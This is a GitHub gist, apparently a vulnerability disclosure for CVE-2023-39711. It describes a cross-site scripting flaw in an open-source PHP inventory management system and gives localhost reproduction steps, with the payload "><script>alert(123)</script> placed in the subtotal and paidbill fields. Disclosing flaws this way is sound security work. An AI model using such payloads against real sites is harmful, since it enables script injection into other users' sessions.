Skip to content

Instantly share code, notes, and snippets.

Created August 25, 2023 07:36
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Exploit Title:Free and Open Source inventory management system php source code -XSS Cross Site Scripting
Vendor of Product -
Software Link:
Tested on: Linux
Attack Type - Local
Steps Of Reproduce -
1. Visit http://localhost/ample/login.php
2. Click on the "Register" button to navigate to the Registration page.
3. After clicking on "Register" we redirect to URL: http://localhost/ample/index.php?page=dashboard
4. go to new buy section http://localhost/ample/index.php?page=buy_product
5. Use payload: "><script>alert(123)</script>
6. Click on Add New 
7. Click on Submit Use XSS payload ( "><script>alert(123)</script> ) put payload in subtotal, paidbill
8. It reflected the value of 123.
Reference: CVE-2023-39711
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment